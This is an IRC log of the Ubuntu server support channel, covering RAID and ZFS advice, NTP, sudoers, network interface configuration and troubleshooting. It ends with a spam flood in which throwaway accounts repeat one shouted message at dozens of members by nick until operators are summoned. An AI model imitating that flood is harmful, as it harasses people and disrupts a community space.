<sarnold> Jenshae: I recommend ZFS over fake raid things. dm or md things are okay, but I never learned how to use them. ZFS provides reliability guarantees that are very difficult to get otherwise.
<trippeh> not sure how that would happen
<Jenshae> That's nothing. We have 9 servers at work and they are minutes out from each other. I tried synching to Google's NTP server (should be the best, right?) well that seems to be 4 minutes out according to all the Apple dorks in the office. :P
<tomreyn> Jenshae: i think a software raid configuration is a better option than any fake raid.
<tomreyn> Jenshae: for i/o performance testing you could try this https://www.thomas-krenn.com/en/wiki/Linux_I/O_Performance_Tests_using_dd
<trippeh> sarnold: ETOOMUCHINFRASTRUCTUREATHOME I guess ;)
<sarnold> be careful with google's NTP servers. they smear their seconds when leap seconds are added. You should only use google's ntp servres if you understand what this means. :)
<sarnold> trippeh: lol
<Jenshae> Thanks guys. My first RAID attempt this year was with Kubuntu server and software raid using mdadm. I partitioned mixed drive sizes of 160, 200, 320 and 500 into 160 chunks and tried to string them together unsuccessfully (guessing part of that is that it was 3x the load to the 500 drives)
<tomreyn> Jenshae: the I/O latency you are experiencing will probably not depend much on which linux distribution you use, but on your hardware, how it works with linux generally (i.e. which quality the drivers are), and on how you configure the system.
<sarnold> Jenshae: heh, that'll probably utterly DESTROY your latency and throughput.
<Jenshae> It was more about just creating one whole partition space for my ... very varied understanding of IT users.
<Jenshae> So it was just a RAID 0 with backup tape. The stuff they were to put on there is over 5 years old, things they should delete but can't let go of.
<Jenshae> Lose a partition, good, got rid of a terabyte or more of rubbish.
<Jenshae> I have since gone around grabbing all the 500GB drives I can out of the workstations.
<Jenshae> Hence why my apprentice has a 160 GB RAID 5, I waved that carrot in his face while I yoinked his drive.
<Jenshae> Also, the machine is a proof of concept before I can get funding for real hardware.
<sarnold> wow raid0 with a bunch of crazy partitioned drives .. brave indeed :)
<Jenshae> Really, I want to just select by modified date and purge ... but they would lynch me.
<Jenshae> If I can blame a machine and say it is just the gambles we take in life, they will cry a bit and let it go.
<Jenshae> They distrust computers and expect them to fail. They also think I am a wizard, Hagrid. They want solutions to all problems within 5 minutes and don't get why one fix is fast and another "small" one takes weeks.
<Jenshae> Quite a few of the staff ... are past retirement age. So, the started their careers on paper ledgers and type writers.
<Jenshae> So, they*
<Jenshae> Going to go jump in my bath before it is frozen. Thank you for the reading material.
<Jenshae> Bizarre thing, the lags seem to be gone.
<sarnold> I can see why it might be hard to get a budget for real hardware then :)
<sarnold> they'll be back :/
<Jenshae> The machine seems to be speeding up while I use it.
<sarnold> it will
<tomreyn> sounds like https://www.youtube.com/watch?v=BKorP55Aqvg
<sarnold> as data is read off the disks into memory, it won't need to be re-read from disk the next time it's needed
<sarnold> tomreyn: :)
<Jenshae> Also being SSHD it is moving frequently used data from magnetic to solid.
<Jenshae> tomreyn: Exactly! :D
<sarnold> I'm pretty skeptical of the benefits of sshd; I could believe they might be an improvement for 'standard desktop users', but it's hard to imagine how they could pull off a general improvement for all use cases
<Jenshae> I have U.2 ports ... but have you ever tried sourcing a drive for them?
<trippeh> not much but intel SSDs for those
<trippeh> pricey ones
<Jenshae> Yup
<Jenshae> No M.2, so I guess I should get a card.
<trippeh> I use a m.2 to PCIe slot adapter for my retro 2008-era computer.
<trippeh> it wont boot of it however.
<Jenshae> I would give you my specs ... if I could find something to list them P
<Jenshae> :P
<Jenshae> Is there an angry bot lurking in this channel that would kick me for pasting multiple lines?
<tomreyn> there should be, and there probably is
<Jenshae> Will try find my pastebin in that case
<tomreyn> !paste
<ubottu> For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<sarnold> the pastebinit tool is nice
<Jenshae> http://paste.ubuntu.com/25623182/
<Jenshae> That work?
<sarnold> yeah. those are very busy disks.
<sarnold> in those four seconds they're not doing anything but the cumulative stats sure look like they're pegged to capacity nearly all the time.
<Jenshae> I have three tabs of firefox, IRC and a Terminal emulator running.
<Jenshae> Not exactly a heavy load.
<sarnold> watch the 'si' and 'so' columns of vmstat 1   output
<sarnold> that _might_ be heavy swapping activity if you don't have enough memory
<trippeh> were they resyncing? or was it raid0, which does no such things
<Jenshae> http://paste.ubuntu.com/25623204/
<Jenshae> I did have it OC'ed to 4.1GHz on a single regular SATA but dropped it to defaults to try get more stability for now.
<sarnold> 64 gigs ram not bad.
<sarnold> nice thing about zfs is you can turn on lz4 compression, it's a lot like getting magically faster disks
<sarnold> time to run, have fun
<Jenshae> si and so are all 0s - http://paste.ubuntu.com/25623220/
<Jenshae> Thanks for the help sarnold
<Jenshae> I made the machine to manipulate national data arrays at home on some consultancy work for the government.
<Jenshae> Turns out that I would have been better set filling all 8 channels with 4GB rather than the initial 8GB in 4 slots. The RAM usage has never been high but speed increased with more units of hardware.
<Jenshae> Currently torn about getting a Vega graphics card. The Vega 64 would be a big enough jump to justify the upgrade from my R9 390 but the cost is high. The Vega 56 isn't a big enough jump but is the right price I would pay for the Vega 64.
<Jenshae> Also, I would probably be in the same boat I was with this card two years ago.
<Jenshae> ... waiting for AMD to release proprietary patches to fix bugs because Mesa is much slower and coming out with latest card support.
<Jenshae> at coming
<Jenshae> Anyhoo, AFK. Thanks again. Most helpful Ubuntu IRC I have been in.
#ubuntu-server 2017-09-27
<nacc> stokachu: in the conjure-up snap, why don't you stage the conjure-up part's usr/lib/python3.5? Isn't that where site-packages get installed to? And also since it's after python3.6, wouldn't it be 3.6?
<nacc> stokachu: nm on the first, i see it's usr/lib not lib/python
<brianw> nice work on lxd integration!
<lordievader> Good morning
<funabash1> hi huys how can i kill tcp        0      0 127.0.0.1:6379          0.0.0.0:*               LISTEN      5140/redis-server 1 ?
<funabash1> kill -9 pid doesnt work it restarts again with a new pid. /etc/init.d/redis-serer doesnt exists
<azidhaka> systemctl stop redis(-server) ?
<rh10> guys, which approach better and more secure: i setup access via ssh using keys, but anyway i need pass to execute some root command
<andol> rh10: Not sure I understand your question fully, but sounds like you might want to configure sudo to allow you to run that specific command without having to enter a password.
<rh10> andol, yep. is most properly way to do it in ubuntu using NOPASSWD option in sudoers?
<andol> rh10: Yepp, NOPASSWD would be it, and (again) preferably having that sudouers entry be restricted to running a particular command.
<rh10> andol, got it, thanks
<rh10> another question. is ubuntu docs (official, community, wiki available as packages for install in disconnected networks?
<funabash1> guys anyone know a tool for check if your ubuntu server are secured ?
<andol> funabash1: How you define secured? Out of the box an Ubuntu server is reasonably secure. Then there are plenty of ways you can create users, install services, etc and make it less secure.
<andol> funabash1: On the other hand, if you want it to be secure in a boolean sense there is always the option to both pull the network chord as well as the power chord.
<andol> funabash1: Anyway, what tools can help you with is that they can warn you about (obvious) insecurities, but the lack of such discoveries doesn't translate into the server being "secure" per se.
<funabash1> andol: like a vulnerability scanner
<funabash1> patched version of programs etc
<funabash1> lynis maybe is a good tool
<nixadmin> Hi all
<nixadmin> Currently now server using 99% of my memory, In linux how can i find the exact amount of memory you would need?
<adac> ok now be honest who of you is Mark Shuttleworth? :-)
<adac> thought this is a nice system montitor, maybe ubuntu likes to add to their packages: https://github.com/aksakalli/gtop
<wretchedspirit> adac gtop looks pretty
<wretchedspirit> htop is always an option too
<wretchedspirit> and it's in the repositories
<adac> wretchedspirit, yeap using that one :)
<adac> mean htop already. very handy
<wretchedspirit> hell yeah
<Walex> adac: it is based on 'node.js'!!!!!! :-(
<adac> yeah :/
<stanfordtools> when I push to git, I'd like my remote server to pull automatically, so that my website is updated. What's the best way to make this automatic? Maybe instead of just pushing I can run another command that pushes and pulls remotely. But how can I make such script?
<lordievader> stanfordtools: You mean something like: https://www.digitalocean.com/community/tutorials/how-to-set-up-automatic-deployment-with-git-with-a-vps
<stanfordtools> no
<stanfordtools> well, kinda
<stanfordtools> I don't want a bare repo
<lordievader> I don't think that that matters. The point of the tutorial is the post-receive scripts.
<stanfordtools> lordievader, I don't need those. I found a way to git pull via ssh
<stanfordtools> so, i think that's all i need
<lordievader> I guess I misunderstand what you want then.
<nacc> dpb1: rbasak: i think i've fixed all the segfaults on x on a, still working through the python dependency chain to make sure the integration tests pass
<nacc> rbasak: you mentioned writing a test for the changelog case I hit yesterday (that is, dpkg-parsechangelog skipping some entries). How do I do that in pytest?
<rbasak> nacc: drop a changelog file that exhibits the problem, and a test function that asserts it?
<rbasak> I don't really know how else to answer the question, sorry.
<nacc> rbasak: we would just be testing dpkg-parsechangelog?
<nacc> rbasak: so i'm not sure what the test shows us other than you can't rely on the behavior on certain distros
<rbasak> nacc: I'm suggesting a test that verifies that the behaviour is the one that we expect, that's all.
<rbasak> So the test will instantly fail if using a wrong dpkg-parsechangelog.
<nacc> rbasak: right, but I'm trying to understand who uses that test?
<nacc> and I don't expect someone runnning from git on xenial to run the unit tests before using the tooling
<nacc> since that seems like the 'use case' -- to konw that you can't do that :)
<nacc> rbasak: i suppose we could have git ubuntu do self-tests on startup and fail to run unless you're on a 'good' OS
<nacc> the snap would somehow avoid that, i thinkn
<nacc> at the same time, the fix is probalby to fix dpkg-parsechangelog on xenial :)
<rbasak> nacc: that's a good point. I had assumed the test would fail if we do it wrong, but as you point out there's a build time vs. runtime distinction.
<nacc> rbasak: yeah, it's messy :)
<nacc> implies, to me, that dpkg-dev needs the unit test
<rbasak> nacc: perhaps we should run our test suites (or a subset that is possible) after building a snap, from the snap?
<nacc> rbasak: yeah, i was going to try that next (via our jenkins job)
<nacc> i think i'll need to switch to a shell
<nacc> but also means i'll need to snap pytest :)
<nacc> so not a priority itself yet
<nacc> pytest-3, rather
<rbasak> This feels like a common problem for all snappers to me.
<rbasak> As-installed testing for snaps.
<rbasak> A bit like dep8.
<nacc> just asked that i #sanppy
<nacc> *snappy
 * nacc needs to clean under the n key
#ubuntu-server 2017-09-28
<lordievader> Good morning
<wretchedspirit> hey!
<manticorpus1> Hi there,
<manticorpus1> I am looking for a nasty bug, I have one Ubuntu server 16.04 who get randomly one ipv6 address (maybe one time on six). I have disable ipv6 both by grub and sysctl, but the system continue to attribute ipv6 address sometimes. Any clues where this can come from ?
<andol> manticorpus1: How you have disabled it using sysctl?
<manticorpus1> yes
<andol> Looks like I missed a word in that question
<andol> manticorpus1: How have you have disabled it using sysctl?
<manticorpus1> I am just looking for the exact command ;)
<DannyS> Hi everyone, I was on here a few days ago about issues with my server, but I can't figure out anything, so my last resort is going to completely re-install the OS, but I was hoping before maybe I can see if any of you guys would be willing to spend 10 minutes, have a dig around my server and be able to explain what is happening? The issue is that my web server is up and people can get to it, but internally, I can't ping google.com or 8.8.8.8,
<DannyS> and I can't update/install packages, because it says can't resolve host. Honestly I am willing to make a user account for anyone, if they can just take a look, because I am lost, and can't figure it out.
<DannyS> Any help is very appreciated
<manticorpus1> andol : I have change the /etc/sysctl.conf and set "net.ipv6.conf.lo.disable_ipv6 = 1" "net.ipv6.conf.all.disable_ipv6 = 1" "net.ipv6.conf.default.disable_ipv6 = 1
<manticorpus1> "
<manticorpus1> Dannys : do you have multiples network interfaces ?
<DannyS> Errr I have eth0 for ipv4 and ipv6
<DannyS> manticorpus1: But ignore me, I left it for a day, came back and it's working so far...?
<andol> manticorpus1: No idea then.
<manticorpus1> andol: That's weird, I think one service must set this ipv6 address. The most weird is the interface is not always the same
<lordievader> DannyS: Sounds like your dns config is broken.
<manticorpus1> Dannys: If you can't ping, it's on network side, not dns
<DannyS> Hmmm, it was really weird, like it's working?
<manticorpus1> Dannys: can you post your network configuration (both ip addr route -n (or ip route if you doesn't have)
<lordievader> Oh wait, 8.8.8.8 also didn't work.
<DannyS> lordievader: It didn't but hang on, it seems to be fine.... I haven\t done anything and it was broken for about 3 days...
<DannyS> So want to see the last edited files
<manticorpus1> so it's not your fault, probably one networking problem
<lordievader> DannyS: Can you resolve`www.google.com`?
<DannyS> I can't understand how it's working now...
<DannyS> No one has done anything
<manticorpus1>  Dannys: Maybe you have some ip conflict
<DannyS> manticorpus1: Well it is hosted by OVH
<lordievader> I suppose manticorpus1 is right, some external network issues.
<DannyS> So I am not sure? Must of messed something up
<manticorpus1> andol : Maybe i get something  "/sbin/dhclient -d -q -sf /usr/lib/NetworkManager/nm-dhcp-helper -pf /var/run/dhclient-eth3.pid -lf /var/lib/NetworkManager/dhclient-6a9a4513-6b47-"
<manticorpus1> andol: On the interface who has ipv6 address
<manticorpus1> andol : Just find why I get a dhcp-client sometimes
<manticorpus1> I have a dhclient who spawn sometimes, somebody know one method to find where is the source of the spawn (the ps command show /sbin/dhclient -d -q -sf /usr/lib/NetworkManager/nm-dhcp-helper -pf /var/run/dhclient-eth3.pid -lf /var/lib/NetworkManager/dhclient-6a9a4513-6b47-3da1-b43b-63ad0445b535-eth3.lease -cf /var/lib/NetworkManager/dhclient-eth3.conf eth3)
<coreycb> jamespage: hello there, i have the pike point release in staging so should be all set to promote to pike-proposed.
<danpawlik> coreycb, beisner: Hello guys. Sorry for pushing, but I would like to ask if is there any progress with gnocchi indexer sqlalchemy (https://bugs.launchpad.net/puppet-gnocchi/+bug/1687235) ?
<ubottu> Launchpad bug 1687235 in puppet-gnocchi "Package gnocchi-indexer-sqlalchemy does not exist on Ubuntu" [High,In progress]
<jamespage> coreycb: sure can!
<jamespage> danpawlik: erm - not quite sure what that package does tbh
<jamespage> danpawlik: I think that's just part of python-gnocchi which all of the gnocchi-* pkgs depend on
<jamespage> confirmed
<danpawlik> jamespage: so you suggest that the package are included in python-gnocchi?
<danpawlik> or in gnocchi-common?
<jamespage> no in python-gnocchi
<danpawlik> jamespage: I will check
<jamespage> danpawlik: it certainly contains gnocchi.indexer.sqlalchemy
<jamespage> danpawlik: and fwiw we're deploying gnocchi in the charms project no problems...
<jamespage> as in the indexer is functional :)
<danpawlik> jamespage: so you suggest that puppet module should be fixed instead of spliting gnocchi packages into few?
<jamespage> danpawlik: I think so yes - gnocchi.indexer.sqlalchemy is part of gnocchi, so we're currently aligned with debian/ubuntu python module packaging standards
<danpawlik> jamespage: ack
<Justice> I have a server with multiple IP's multiple gateways but same interface
<Justice> how do I set this up in etc/network/interfaces
<genii> eth0 eth0:1 eth0:2 etc
<nacc> I believe the term is aliases
<Justice> and just define the gateway there for each ip?
<nacc> Justice: well, you'll have multiple stanzas
<genii> None of them can be on the same network segment either
<sdeziel> aliases are deprecated AFAIK
<nacc> sdeziel: heh, good to know
<sdeziel> for multiple IPs, I generally resort to "post-up ip addr add .... || true"
<nacc> sdeziel: that's a good suggestion too (should work the same)
<sdeziel> having multiple (default?) gateways will be a bit tricky though
<Justice> sdeziel, what do you mean with depricated?
<Justice> sdeziel, so say i have 4 groups of gateways and multiple adresses with each group how would I define it in network/interfaces?
<Justice> http://pastebin.ubuntu.com/25634129/
<sdeziel> Justice: looks about right (except that you use route and iface labels which are both deprecated)
<Justice> sdeziel, how would i do it in another way?
<sdeziel> Justice: I've never used multiple weighted gateways so let's hear what others have to say about it
<sdeziel> Justice: I just looked and your eth0:0 is badly defined, the netmask/broadcast/network don't add up
<sdeziel> Justice: nowadays, I recommend simply using "address 31.133.NNN.254/25" and not put the netmask/broadcast/network, unless needed
<Justice> yes my local config got that too
<sdeziel> so for eth0:0, is it a /25 or a /24?
<Justice> that was just an example i found how to bind gateways but could not figure out how i add more ips to each gateway
<Justice> its /24
<sdeziel> OK, I'm crafting something, sec
<sdeziel> hmm, eth0:0 and eth0:1 are identical
<Justice> but one sec
<Justice> can i also define ranges or do i need to specify each ?
<Justice> because the actual ranges are 4 groups of  /26 total 250IPs
<rbasak> powersj: I'm told the server image is oversized
<sdeziel> now they are /26s not /24s?
<sdeziel> Justice: here's an example of what I'd try: https://paste.ubuntu.com/25634237/ I dropped your pre-down because routes (and IPs) are automatically cleaned up when the interface is down'ed
<Justice> whats the || true ?
<Justice> else true ?
<sdeziel> yes
<sdeziel> to ensure ifup keeps going on even on errors (I think it does anyway for post-ups but better be safe)
<Justice> ah
<Justice> sdeziel, do you know if I can add whole ranges of IP instead of specifying each ?
<powersj> rbasak: they have all been oversized for many months :)
<rbasak> powersj: sorry. Just passing on the message :)
<powersj> np :)
<sdeziel> Justice: not that *I* know
 * Justice 250+ lines later...
<Justice> sdeziel, hm dont think it worked
<sdeziel> Justice: which part?
<Justice> ip addr wont list the other ips
<Justice> now I did declare iface ens192 twice once with the one its default configs (for fallback) and another with those the post-up
<sdeziel> Justice: you have to "iface ens192" stanzas?
<Justice> yes
<sdeziel> that's not possible
<Justice> it did work on my other box though did not use multiple gateways
<sdeziel> how can "ifup ens192" know which stanza to use?
<Justice> On my other ubuntu 16.04 i have https://paste.ubuntu.com/25634460/
<sdeziel> Justice: right you are, the man pages says it's supported
<Justice> but the question is why didnt it work with post-up
<Justice> are there any logs or anything ?
<sdeziel> journalctl -u ifup@ens192
<superboot> Hi all. I'm installing Ubuntu Server 16.04LTS 64bit and have already configured my partitions for a raid1 setup with LVM on top, and have created the LV I want to use. However, the partitioner section of the installer doesn't show my LVs as a target. If I go into "Configure the Logical Volume Manager" it lists my VG and the LVs. They are just noe listed in on the main screen. Hints?
<superboot> LVs are thin (--thin) FYI
<superboot> Anyone?
<Justice> sdeziel, hm think i got it working quite close to previous
<Justice> https://paste.ubuntu.com/25634615/
<superboot> Hello. What is the recommended way to make the system re-read /etc/network/interfaces? Or is there a more ubuntu-ic way of setting interface settings?
<superboot> (server 16.04LTS
<superboot> )
<sarnold> ifup <interfacename> or ifdown <interfacename>
<sarnold> I don't think there's any mechanism to say "make the state of the world match what's described here"
<superboot> sarnold: Well, I've set a static IP in that file, but I can't get the interface to use it. ifdown/up causes it to resume with the same DHCP assigned address.
<superboot> systemctl restart networking does the same thing also
<superboot> ifconfig outputs the old address, however, pining the new address works... what am I missing?
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: aprui
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: wretchedspirit
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: m_3
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mike-zal
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: shodan45
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: icey
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Jeepbea
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Screedo
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: glebihan_
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Chrisfu-
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: SpamapS
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: danpawlik
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: guideline
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: droman0
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: droman0
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: alinefm
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Tahvok
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: din0
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pesari
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: kebbanalex_
<nacc> sigh
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: octanium
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pjdc
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Syam[m]
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: martinst
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lionel
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mthaddon
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: fatdragon
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Kaelten
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: skylite
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bvi
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lordievader
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Chrisfu
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dcmorton
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: blizzaqt
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: seyeongkim
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sipior
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dcmorton
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sipior
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: marlinc
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Village
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ChmEarl
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: demonspork
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: nOgAnOo
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: StathisA
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: devster
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: patdk-wk
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mollerup_
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: zzxc
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jemurray
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ducasse
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: zerick
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: voxxit
<nacc> !ops
<ubottu> Help! Channel emergency! infinity, soren, lamont, mathiaz, Pici, Daviey, Tm_T, Corey, IdleOne, ikonia, funkyhat, Myrtti, ocean, genii, phunyguy!
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Chrisfu
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: glebihan_
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tinwood
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: clvx
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Piper-Off
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: flarunt
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: clayton
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: keithzg[m]
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tomreyn
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dragan-s
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Kamilion
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Arkaniad
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: aluria
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: clvx
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Typhon
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: trobotham
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: xibalba
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: qman__
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: macskay
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rbasak
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: coreycb
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: iberezovskiy
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Dasoren[m]
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: null_ref
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: zioproto
<crazylebgou> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: alai
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Beret
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Poster
<crazylebgou> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cncr04s
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ChmEarl
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: elky
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ChmEarl
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: GLaDER
